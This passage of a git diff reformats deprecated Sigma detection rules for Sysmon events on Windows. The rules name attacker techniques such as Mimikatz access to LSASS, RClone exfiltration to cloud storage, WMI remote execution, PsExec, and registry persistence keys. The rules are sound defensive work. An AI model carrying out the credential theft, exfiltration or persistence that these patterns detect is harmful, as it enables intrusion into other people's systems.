+ condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh) fields: - ComputerName - User diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml index 1d9e88af4..ea34a2377 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml @@ -1,8 +1,7 @@ title: Suspicious Bitstransfer via PowerShell id: cd5c8085-4070-4e22-908d-a5b3342deb74 status: deprecated -description: Detects transferring files from system on a server bitstransfer Powershell - cmdlets +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets references: - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: Austin Songer @austinsonger @@ -25,7 +24,7 @@ detection: - \powershell.exe - \powershell_ise.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - Get-BitsTransfer - Add-BitsFile condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml index 76bdb4e05..db1ee4482 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml @@ -1,8 +1,7 @@ title: Suspicious Cmd Execution via WMI id: e31f89f7-36fb-4697-8ab6-48823708353b status: deprecated -description: Detects suspicious command execution (cmd) via Windows Management Instrumentation - (WMI) on a remote host. This could be indicative of adversary lateral movement. +description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. references: - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html author: Tim Rauch @@ -22,9 +21,9 @@ detection: selection: Image|endswith: \cmd.exe ParentImage|endswith: \WmiPrvSE.exe - CommandLine|contains: \\\\127.0.0.1\\ + CommandLine|contains: \\\\127.0.0.1\\ selection_opt: - CommandLine|contains: + CommandLine|contains: - 2>&1 - 1> condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml index d8619ef14..6b21238d5 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml @@ -1,8 +1,7 @@ title: Suspicious Characters in CommandLine id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 status: deprecated -description: Detects suspicious Unicode characters in the command line, which could - be a sign of obfuscation or defense evasion +description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation author: Florian Roth (Nextron Systems) @@ -19,18 +18,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml index 25d453540..d31d4ad86 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml @@ -1,8 +1,7 @@ title: Wscript Execution from Non C Drive id: 5b80cf53-3a46-4adc-960b-05ec19348d74 status: deprecated -description: Detects Wscript or Cscript executing from a drive other than C. This - has been observed with Qakbot executing from within a mounted ISO file. +description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. references: - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ @@ -25,21 +24,21 @@ detection: - \wscript.exe - \cscript.exe selection_exetensions: - CommandLine|contains: + CommandLine|contains: - .js - .vbs - .vbe selection_drive_path: - CommandLine|contains: :\ + CommandLine|contains: :\ filter_drive_path: - CommandLine|contains: + CommandLine|contains: - ' C:\\' - - ' ''C:\' + - " 'C:\\" - ' "C:\\' filter_env_vars: - CommandLine|contains: '%' + CommandLine|contains: '%' filter_unc_paths: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Legitimate scripts located on other partitions such as "D:" diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml index be4b38574..7f18f5b3f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml @@ -1,8 +1,7 @@ title: Process Start From Suspicious Folder id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b status: deprecated -description: Detects process start from rare or uncommon folders like temporary folder - or folders that usually don't contain executable files +description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files references: - Malware sandbox results author: frack113 @@ -25,19 +24,19 @@ detection: - \Temp\ - \Temporary Internet filter_parent: - - ParentImage: - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe - - C:\Windows\System32\dxgiadaptercache.exe - - ParentImage|startswith: C:\Program Files (x86)\NVIDIA Corporation\ + - ParentImage: + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe + - C:\Windows\System32\dxgiadaptercache.exe + - ParentImage|startswith: C:\Program Files (x86)\NVIDIA Corporation\ filter_other: - Image|endswith: setup.exe + Image|endswith: setup.exe # the missing \ at the beginning is intended - to cover e.g. MySoftwareSetup.exe as well filter_edge: Image|startswith: C:\Program Files (x86)\Microsoft\Temp\ Image|endswith: .tmp\MicrosoftEdgeUpdate.exe + #OriginalFileName: msedgeupdate.dll condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" - directories + - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml index e21b6d2f4..2d46664bd 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml @@ -23,30 +23,30 @@ detection: selection1: Image|endswith: \update.exe selection2: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_discord: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_teams: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml index 18b6c7fab..8e9944649 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml @@ -1,8 +1,8 @@ title: PsExec Tool Execution id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: deprecated description: Detects PsExec service execution via default service image name references: @@ -25,7 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \PSEXESVC.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml index 84682846b..7d40ae97f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml @@ -18,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: C:\Windows\PSEXESVC.exe + CommandLine: C:\Windows\PSEXESVC.exe condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml b/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml index 597a6d675..3a0bad7f8 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml @@ -1,8 +1,7 @@ title: Run Whoami as SYSTEM id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 status: deprecated -description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of - a successful local privilege escalation. +description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov, Florian Roth @@ -21,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - OriginalFileName: whoami.exe - - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe condition: process_creation and (all of selection*) falsepositives: - Possible name overlap with NT AUHTORITY substring to cover all languages diff --git a/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml b/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml index 99dbb7d30..849709103 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml @@ -16,7 +16,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \winword.exe - CommandLine|contains: /l + CommandLine|contains: /l condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml index 79da678e0..10f837934 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml @@ -1,13 +1,12 @@ title: WMI Execution Via Office Process id: 518643ba-7d9c-4fa5-9f37-baed36059f6a related: - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: similar + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: similar status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -29,8 +28,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_parent: ParentImage|endswith: - \winword.exe diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml index c4f34f737..14d3333f2 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - process - call diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml index e08650253..ef2bace58 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml @@ -1,19 +1,11 @@ title: WMI Reconnaissance List Remote Services id: 09af397b-c5eb-4811-b2bb-08b3de464ebf status: deprecated -description: 'An adversary might use WMI to check if a certain Remote Service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain Remote Service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -32,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - service condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml index fd3353f7c..d81571ff6 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml @@ -21,15 +21,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - Image|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /UpdateDeploymentProvider - /RunHandlerComServer - .dll filter: - CommandLine|contains: + CommandLine|contains: - ' /ClassId ' - ' wuaueng.dll ' condition: process_creation and (all of selection* and not filter) diff --git a/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml b/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml index 06f7a826e..4ac4066dc 100644 --- a/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml +++ b/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -1,10 +1,9 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: fde7929d-8beb-4a4c-b922-be9974671667 -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/04/11 tags: diff --git a/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml index 0c007ebfc..59459d52c 100644 --- a/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml +++ b/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml @@ -1,8 +1,7 @@ title: Sysinternals SDelete Registry Keys id: 9841b233-8df8-4ad7-9133-b0b4402a9014 status: deprecated -description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete - registry keys. Indicators of the use of Sysinternals SDelete tool. +description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md @@ -21,7 +20,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: \Software\Sysinternals\SDelete condition: registry_add and selection falsepositives: diff --git a/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml b/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml index ed0eee88f..5005cfd06 100644 --- a/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml +++ b/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml @@ -5,11 +5,10 @@ status: deprecated references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 modified: 2022/05/14 -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton logsource: category: registry_event product: windows @@ -194,25 +193,17 @@ detection: - \Lsa\Authentication Packages - \BootVerificationProgram\ImagePath filter: - - Details: (Empty) - - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount - - Image: C:\WINDOWS\System32\svchost.exe - condition: registry_event and (( main_selection or session_manager_base and session_manager - or current_version_base and current_version or nt_current_version_base and - nt_current_version or wow_current_version_base and wow_current_version or - wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) - and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base - and wow_classes or classes_base and classes or scripts_base and scripts or - winsock_parameters_base and winsock_parameters or system_control_base and - system_control ) and not filter) + - Details: (Empty) + - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount + - Image: C:\WINDOWS\System32\svchost.exe + condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason tags: - attack.persistence diff --git a/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml index bd1fad121..a67825ece 100644 --- a/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml +++ b/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml @@ -1,16 +1,10 @@ title: Abusing Windows Telemetry For Persistence - Registry id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: deprecated -description: 'Windows telemetry makes use of the binary CompatTelRunner.exe to run - a variety of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman diff --git a/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml b/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml index 01d03be63..d24dbe052 100644 --- a/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml +++ b/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml @@ -1,8 +1,7 @@ title: User Account Hidden By Registry id: 8a58209c-7ae6-4027-afb0-307a78e4589a status: deprecated -description: Detect modification for a specific user to prevent that user from being - listed on the logon screen +description: Detect modification for a specific user to prevent that user from being listed on the logon screen references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md author: frack113 diff --git a/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml b/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml index 23f1ed449..5a0bdd4d9 100644 --- a/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml +++ b/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml @@ -17,6 +17,11 @@ logsource: product: windows category: registry_set definition: key must be add to the sysmon configuration to works + # Sysmon + # \VBAWarnings + # \DisableInternetFilesInPV + # \DisableUnsafeLocationsInPV + # \DisableAttachementsInPV detection: registry_set: EventID: 13 diff --git a/sigma/sysmon/deprecated/registry_set_office_security.yml b/sigma/sysmon/deprecated/registry_set_office_security.yml index 440d6044c..2ad80625d 100644 --- a/sigma/sysmon/deprecated/registry_set_office_security.yml +++ b/sigma/sysmon/deprecated/registry_set_office_security.yml @@ -1,8 +1,7 @@ title: Office Security Settings Changed id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd status: deprecated -description: Detects registry changes to Office macro settings. The TrustRecords contain - information on executed macro-enabled documents. (see references) +description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml b/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml index f06c06827..e197d5836 100644 --- a/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml +++ b/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml @@ -1,8 +1,7 @@ title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 status: deprecated -description: Detects changes to the Registry in which a monitor program gets registered - to monitor the exit of another process +description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml index 81ea2d871..606ed4cea 100644 --- a/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml +++ b/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml @@ -1,9 +1,7 @@ title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon id: e554f142-5cf3-4e55-ace9-a1b59e0def65 status: deprecated -description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program - Files\Internet Explorer\` directory over the network and loading it for a DCOM - InternetExplorer DLL Hijack scenario. +description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga diff --git a/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml b/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml index ebe6d7377..527d6cbf5 100644 --- a/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml +++ b/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml @@ -1,9 +1,7 @@ title: Mimikatz Detection LSASS Access id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 status: deprecated -description: Detects process access to LSASS which is typical for Mimikatz (0x1000 - PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old - versions", 0x0010 PROCESS_VM_READ) +description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html diff --git a/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml b/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml index cbaa6f451..b9f84c88a 100644 --- a/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml +++ b/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml @@ -9,7 +9,7 @@ references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html tags: - attack.execution - - attack.t1086 + - attack.t1086 # an old one - attack.t1059.001 - sysmon logsource: diff --git a/sigma/sysmon/deprecated/sysmon_rclone_execution.yml b/sigma/sysmon/deprecated/sysmon_rclone_execution.yml index 6e5631f80..9573c032b 100644 --- a/sigma/sysmon/deprecated/sysmon_rclone_execution.yml +++ b/sigma/sysmon/deprecated/sysmon_rclone_execution.yml @@ -1,8 +1,7 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c status: deprecated -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration - attack.t1567.002 @@ -32,14 +31,14 @@ detection: selection: Description: Rsync for cloud storage selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection3: Image|endswith: - \rclone.exe - CommandLine|contains: + CommandLine|contains: - mega - pcloud - ftp diff --git a/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml b/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml index 68971ed13..e59631ecb 100644 --- a/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml +++ b/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml @@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \dsquery.exe - CommandLine|contains|all: - - -filter - - trustedDomain - - Image|endswith: \nltest.exe - CommandLine|contains: domain_trusts + - Image|endswith: \dsquery.exe + CommandLine|contains|all: + - -filter + - trustedDomain + - Image|endswith: \nltest.exe + CommandLine|contains: domain_trusts condition: process_creation and selection falsepositives: - Administration of systems. diff --git a/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml b/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml index 6ed0e7b0e..5f2ad209d 100644 --- a/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml +++ b/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml @@ -1,9 +1,7 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated -description: Detects flags often used with the LOLBAS Esentutl for malicious activity. - It could be used in rare cases by administrators to access locked files or during - maintenance. +description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 @@ -24,7 +22,7 